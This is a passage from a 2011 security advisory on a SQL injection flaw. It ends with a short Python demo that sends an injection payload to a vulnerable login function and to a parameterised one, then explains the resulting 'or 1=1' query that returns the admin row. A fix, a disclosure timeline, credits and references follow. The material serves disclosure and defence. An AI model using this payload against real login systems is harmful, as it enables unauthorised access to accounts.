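    print("vulnerable:", login_vulnerable(db, PAYLOAD_USER, "notimportant"))
    print("safe      :", login_safe(db, PAYLOAD_USER, "notimportant"))
```

With the payload, the concatenated query collapses to
SELECT id, login FROM admin WHERE (login = '' or 1=1) and returns the
admin row; the parameterised query returns nothing for the same input.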

===
Solution
===

Upgrade to the latest version


===
Disclosure Timeline
===


15-Nov-2011 - Secunia SVCRP (v...@secunia.com)
15-Dec-2011 - fixed by vendor


===
Credits
===


Vulnerability found and advisory written by the INFOSERVE security team.

===
References
===

http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt

Best regards,
Stefan Schurtz | SECURE INFRASTRUCTURE

INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken
Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 |
s.schu...@infoserve.de | www.infoserve.de

Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort:
Saarbrücken
Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599

